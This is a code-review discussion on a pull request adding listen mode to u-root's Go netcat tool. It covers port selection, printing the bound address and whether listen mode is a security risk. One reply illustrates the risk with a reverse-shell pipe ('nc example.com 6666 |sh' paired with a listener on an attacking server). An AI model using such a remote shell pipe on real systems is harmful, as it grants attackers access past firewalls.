cmds/netcat/netcat.go

```diff
@@ -33,15 +34,30 @@ func main() {
 		os.Exit(1)
 	}
 
-	if c, err = net.Dial(*netType, flag.Args()[0]); err != nil {
-		log.Fatalf("%v\n", err)
+	addr := flag.Args()[0]
```

Comment:
I'm reading this again and I think there's some usability issues. 

you test for len(flag.Args()) < 1. What if there are two args? That does not seem to be used. 

How do they know what addr to pick? What if they pick an address and it is in use? This seems like a tedious exercise to find an  open port. 

What if they pick a port that means "whatever port you want" (e.g. addr is ":" or ":0")-- how do they know what port to connect to? You don't print it below. You might want to add a message to the effect of "listening on %v"

Reply:
This is the behaviour of the mainstream netcat implementations.
If the address is already in use we get an error:
```
matteo@raver:~/src/u-root/cmds/netcat$ nc -lp 2500 &
[1] 6433
matteo@raver:~/src/u-root/cmds/netcat$ go run netcat.go -l :2500
2017/12/17 21:02:01 listen tcp :2500: bind: address already in use
exit status 1
```
While when specifying port 0 a random one is chosen:
```
matteo@raver:~/src/u-root/cmds/netcat$ nc -lp 0 &
[1] 6731
matteo@raver:~/src/u-root/cmds/netcat$ netstat -npl |grep /nc
tcp        0      0 0.0.0.0:45891           0.0.0.0:*               LISTEN      6731/nc             
matteo@raver:~/src/u-root/cmds/netcat$ go run netcat.go -l : &
[1] 6954
matteo@raver:~/src/u-root/cmds/netcat$ netstat -npl |grep /netcat
tcp        0      0 0.0.0.0:43495           0.0.0.0:*               LISTEN      6998/netcat         

```
BTW I'm ok in putting a message with the bound port, as long as it goes to stderr.
What do you think?

Reply:
yeah, that sounds fine. Let's be careful to not bound ourselves by the 'mainstream netcat'. There are at least two anyway. We want to implement some of those common commands, but we don't need to copy broken behavior, and forcing me to use netstat scripts to find out what port my own netcat is listening on -- that's broken. Forcing me to guess at an open tcp port is also not great. 

Finally, I'm a bit worried about this listen mode anyway. It's creating a gigantic security hole -- do we really want to do this?

Reply:
How is it a gigantic security hole?

Reply:
Well, the security hole is allowing a malicious user to run netcat, either in client or server mode.
A netcat pipe can bring access to a machine even in client mode, think about something like `nc example.com 6666 |sh` run on the attacked machine and `nc -lp 6666` listening on the attacking server.
Most attacks are made like this because it bypasses NAT and most firewalls, which usually allow all outbound traffic.

Reply:
@rminnich Idea, what about adding a `-v` argument which prints on stderr the address on both client and server mode?

Reply:
Sounds reasonable to me (-v to stderr).

Reply:
consider a simple case. A user starts up a netcat in listen mode for whatever reason. Then they forget. Anyone poking around for open sockets on machines might find it and at that point can grab whatever random file they want. Mistakes like this happen and people we don't like catch them. It's surprisingly common. People poke all over the net for open ports like this.

As for the -v to print the address for the listen, it's still kind of a pain for the case that the user wants "any open socket". e.g. 
netcat -l : 


will just sit there and force you to do the grepping around (in another window, maybe) for the port. That just seems annoying. Maybe you can print if the address has an empty or zero-valued port, but I know I'd get quite annoyed with a program that picked a port and did not tell me what it was.

Reply:
Sure, that can happen. But that is not on netcat. It's just a simple utility. If a user of u-root wants to mitigate that risk, they can choose not to include netcat in their build. I don't think it should keep us from adding features.

Reply:
difference of opinion then. I won't argue it further.